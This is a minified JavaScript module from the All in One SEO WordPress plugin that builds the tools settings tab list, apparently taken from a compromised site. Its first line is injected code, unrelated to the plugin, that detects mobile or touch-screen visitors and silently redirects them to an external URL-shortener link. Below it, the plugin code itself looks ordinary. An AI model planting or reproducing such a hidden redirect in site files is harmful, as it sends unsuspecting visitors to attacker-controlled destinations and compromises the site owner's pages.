(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{b as u,h as _,C as p,x as g}from"./app-core.c8323d51.js";import{u as l}from"./vendor-vue-ui.232c7c36.js";import{_ as s}from"./vendor-other.39e59221.js";const e="all-in-one-seo-pack",f=()=>{const i=l(()=>{const a=[{value:"webmasterTools",label:s("Webmaster Tools",e),access:"aioseo_general_settings"},{value:"rssContent",label:s("RSS Content",e),access:"aioseo_general_settings"},{value:"advanced",label:s("Advanced",e),access:"aioseo_general_settings"},{value:"searchAppearance",label:s("Search Appearance",e),access:"aioseo_search_appearance_settings"},{value:"social",label:s("Social Networks",e),access:"aioseo_social_networks_settings"},{value:"sitemap",label:s("Sitemaps",e),access:"aioseo_sitemap_settings"},{value:"robots",label:s("Robots.txt",e),access:"aioseo_tools_settings"},{value:"breadcrumbs",label:s("Breadcrumbs",e),access:"aioseo_general_settings"}],o=u();o.isPro&&a.push({value:"accessControl",label:s("Access Control",e),access:"aioseo_admin"});const t=_();return o.isPro&&!t.isUnlicensed&&a.push({value:"redirects",label:s("Redirects",e),access:"aioseo_redirects_settings"}),!t.isUnlicensed&&n("aioseo-image-seo")&&a.push({value:"image",label:s("Image SEO",e),access:"aioseo_search_appearance_settings"}),!t.isUnlicensed&&n("aioseo-local-business")&&a.push({value:"localBusiness",label:s("Local Business SEO",e),access:"aioseo_local_seo_settings"}),!t.isUnlicensed&&n("aioseo-link-assistant")&&a.push({value:"linkAssistant",label:s("Link Assistant",e),access:"aioseo_link_assistant_settings"}),!t.isUnlicensed&&n("aioseo-eeat")&&a.push({value:"eeat",label:s("Author SEO (E-E-A-T)",e),access:"aioseo_search_appearance_settings"}),a.filter(r=>p(r.access))}),n=a=>{const o=g.getAddon(a);return o&&o.isActive&&!o.requiresUpgrade},c=l(()=>i.value.filter(a=>a.value!=="redirects"));return{toolsSettings:i,toolsExportSettings:c}};export{f as u};
